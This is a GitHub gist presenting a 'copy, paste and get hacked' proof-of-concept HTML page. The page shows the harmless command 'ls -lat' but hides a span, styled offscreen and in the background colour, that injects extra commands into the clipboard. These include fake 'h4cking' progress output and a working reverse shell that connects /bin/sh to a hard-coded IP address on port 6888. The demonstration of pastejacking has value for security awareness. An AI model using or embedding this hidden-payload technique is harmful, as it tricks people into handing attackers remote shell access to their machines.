Skip to content

Instantly share code, notes, and snippets.

@intrd
Last active October 16, 2021 13:12
Show Gist options
  • Select an option

  • Save intrd/36672e78d88ef3e46f7fcb6b5b6dcc37 to your computer and use it in GitHub Desktop.

Select an option

Save intrd/36672e78d88ef3e46f7fcb6b5b6dcc37 to your computer and use it in GitHub Desktop.
## Copy, paste and get hacked (PoC)
# @author intrd - http://dann.com.br/ (based on https://lifepluslinux.blogspot.com.br/2017/01/look-before-you-paste-from-website-to.html)
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
<!DOCTYPE html>
<html>
<head>
</head>
<body>
<style>
.intrd {
color: #f3f5f6;
position: absolute;
left: -100px;
top: -100px;
height: 0px;
z-index: -100;
display: inline-block;
-webkit-touch-callout: none;
-khtml-user-select: none;
-ms-user-select: none;
user-select: none;
}
</style>
<code style="style="background-color: #eeeeee; padding: 10px;">
Copy this and paste to your terminal:
<span>ls</span>
<!-- Here it is -->
<span class="intrd">
; clear; echo 'Haha!';
echo -ne 'h4cking ## (10%)\r';
sleep 0.3;
echo -ne 'h4cking ### (20%)\r';
sleep 0.3;
echo -ne 'h4cking ##### (33%)\r';
sleep 0.3;
echo -ne 'h4cking ####### (40%)\r';
sleep 0.3;
echo -ne 'h4cking ########## (50%)\r';
sleep 0.3;
echo -ne 'h4cking ############# (66%)\r';
sleep 0.3;
echo -ne 'h4cking ##################### (99%)\r';
sleep 0.3;
echo -ne 'h4cking ####################### (100%)\r';
echo -ne '\n';
echo 'Hacking complete.';
/bin/sh &#60;/dev/tcp/191.191.242.247/6888 &#62;&0 2&#62;&0 &#38;
<br> ls
</span>
<span>-lat </span>
</code>
</body>
</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment